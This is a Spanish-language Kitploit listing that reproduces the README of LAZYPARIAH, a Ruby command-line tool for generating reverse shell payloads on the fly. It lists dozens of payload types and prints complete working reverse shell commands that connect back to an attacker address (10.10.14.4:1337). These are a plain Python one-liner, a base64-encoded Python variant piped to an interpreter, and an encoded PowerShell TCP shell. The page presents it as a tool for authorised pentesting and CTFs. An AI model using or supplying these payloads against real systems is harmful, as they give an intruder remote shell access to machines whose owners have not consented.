Skip to content
KitploitKITPLOIT
HerramientasExploitsBlog
Log in
Enviar
HerramientasExploitsBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
LAZYPARIAH — Una herramienta para generar payloads de reverse shell sobre la marcha. | Kitploit
Herramientas/GitHubGitHub/octetsplicer/lazypariah
Generación de PayloadsExplotaciónCTFPruebas de PenetraciónComando y ControlRed TeamingGeneración de ShellcodeDesarrollo de PayloadsArchived
GitHuboctetsplicer/lazypariah

LAZYPARIAH

Una herramienta para generar payloads de reverse shell sobre la marcha.

124hace 6 mesesAún no revisado
Ver Repositorio

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir

LAZYPARIAH

Una herramienta de línea de comandos de baja dependencia para generar payloads de reverse shell sobre la marcha.

Alt text

Descripción

LAZYPARIAH es una herramienta de línea de comandos simple y fácilmente instalable escrita en Ruby puro que puede ser utilizada durante pruebas de penetración y competiciones capture-the-flag (CTF) para generar una variedad de payloads de reverse shell sobre la marcha.

Los payloads de reverse shell que LAZYPARIAH soporta incluyen (pero no se limitan a):

  • Payloads binarios C (compilados sobre la marcha): c_binary
  • Payloads Ruby: ruby, ruby_b64, ruby_hex, ruby_c
  • Payloads Powershell: powershell_c, powershell_b64
  • Payloads Python codificados en Base64: python_b64
  • Payloads binarios Rust (compilados sobre la marcha): rust_binary
  • Scripts PHP que contienen payloads Python codificados en base64 llamados a través de la función system(): php_system_python_b64
  • Clases Java (compiladas sobre la marcha): java_class
  • Payloads Perl: perl, perl_b64, perl_hex, perl_c
  • Payloads PHP simples (dirigidos a descriptores de archivo específicos): php_fd, php_fd_c, php_fd_tags

Advertencia

Esta herramienta está diseñada para ser utilizada solo en circunstancias autorizadas por probadores de penetración calificados, investigadores de seguridad y profesionales de equipos rojos. Antes de descargar, instalar o usar esta herramienta, asegúrese de comprender las leyes relevantes en su jurisdicción. El autor de esta herramienta no respalda, fomenta ni tolera el uso de esta herramienta para fines ilegales o no autorizados.

Dependencias

  • Ruby >= 2.7.1 (LAZYPARIAH no ha sido probado en versiones anteriores de Ruby)
  • OpenJDK (Opcional: Solo se requiere para payloads java_class.)
  • GCC (Opcional: Solo se requiere para payloads c_binary.)
  • Rust (Opcional: Solo se requiere para payloads rust_binary.)

Instalación

LAZYPARIAH se puede instalar en la mayoría de los sistemas GNU/Linux y BSD usando el instalador de RubyGems de la siguiente manera:

gem install lazypariah

Uso

Usage:	lazypariah [OPTIONS] <PAYLOAD TYPE> <ATTACKER HOST> <ATTACKER PORT>
Note:	<ATTACKER HOST> may be an IPv4 address, IPv6 address or hostname.

Example:	lazypariah -u python_b64 10.10.14.4 1555
Example:	lazypariah python_c malicious.local 1337

Valid Payloads:
    awk
    bash_tcp
    c_binary
    java_class
    nc
    nc_openbsd
    nc_pipe
    nodejs
    nodejs_b64
    nodejs_c
    nodejs_hex
    perl
    perl_b64
    perl_c
    perl_hex
    php_fd
    php_fd_c
    php_fd_tags
    php_system_python_b64
    php_system_python_hex
    php_system_python_ipv6_b64
    php_system_python_ipv6_hex
    powershell_b64
    powershell_c
    python
    python_b64
    python_c
    python_hex
    python_ipv6
    python_ipv6_b64
    python_ipv6_c
    python_ipv6_hex
    ruby
    ruby_b64
    ruby_c
    ruby_hex
    rust_binary
    socat

Valid Options:
    -h, --help                       Display help text and exit.
    -l, --license                    Display license information and exit.
    -u, --url                        URL-encode the payload.
    -v, --version                    Display version information and exit.
    -D, --fd INTEGER                 Specify the file descriptor used by the target for TCP. Required for certain payloads.
    -P, --pv INTEGER                 Specify Python version for payload. Must be either 2 or 3. By default, no version is specified.
    -N, --no-new-line                Do not append a new-line character to the end of the payload.
        --b64                        Encode a c_binary, rust_binary or java_class payload in base-64.
        --hex                        Encode a c_binary, rust_binary or java_class payload in hexadecimal.
        --gzip                       Compress a c_binary, rust_binary or java_class payload using zlib.
        --gzip_b64                   Compress a c_binary, rust_binary or java_class payload using zlib and encode the result in base-64.
        --gzip_hex                   Compress a c_binary, rust_binary or java_class payload using zlib and encode the result in hexadecimal.

Notas y Ejemplos Adicionales

Los payloads listados anteriormente tienen nombres más o menos sistemáticos.

Los payloads que terminan en _c están destinados a ser ejecutados desde una sesión de shell. Estos payloads ejecutan código directamente utilizando el intérprete relevante (por ejemplo, python3 -c o ruby -e).

Por ejemplo, el comando lazypariah python_c 10.10.14.4 1337 debería producir la siguiente salida:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

El comando lazypariah python 10.10.14.4 1337, por otro lado, debería simplemente producir un bloque de código Python que podría ser colocado en un archivo .py:

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.4",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);

En términos generales, seleccionar payloads que terminan en _b64 debería producir un comando destinado a ejecutarse desde una sesión de shell de manera similar a los payloads que terminan en _c, pero los comandos serán diferentes en estructura. Estos comandos básicamente canalizarán un bloque de código codificado en base64 a través de base64 -d y luego al intérprete relevante (como python3, python2 o ruby).

Por ejemplo, el comando lazypariah python_b64 10.10.14.4 1337 debería producir la siguiente salida:

echo aW1wb3J0IHNvY2tldCxzdWJwcm9jZXNzLG9zO3M9c29ja2V0LnNvY2tldChzb2NrZXQuQUZfSU5FVCxzb2NrZXQuU09DS19TVFJFQU0pO3MuY29ubmVjdCgoIjEwLjEwLjE0LjQiLDEzMzcpKTtvcy5kdXAyKHMuZmlsZW5vKCksMCk7IG9zLmR1cDIocy5maWxlbm8oKSwxKTsgb3MuZHVwMihzLmZpbGVubygpLDIpO3A9c3VicHJvY2Vzcy5jYWxsKFsiL2Jpbi9zaCIsIi1pIl0pOw== | base64 -d | python

La excepción a esto es powershell_b64, que utiliza el decodificador base64 incorporado de Powershell. El comando lazypariah powershell_b64 10.10.14.4 1337, por ejemplo, debería devolver lo siguiente:

powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACcAMQAwAC4AMQAwAC4AMQA0AC4ANAAnACwAMQAzADMANwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAJwBQAFMAIAAnACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAJwA+ACAAJwA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

(Nota: La longitud del payload anterior se debe al hecho de que Powershell utiliza codificación UTF-16LE, donde un solo carácter corresponde a dos bytes.)

Este tipo de payloads puede ser útil en ciertas situaciones porque no incluyen comillas simples o dobles.

Descargar herramienta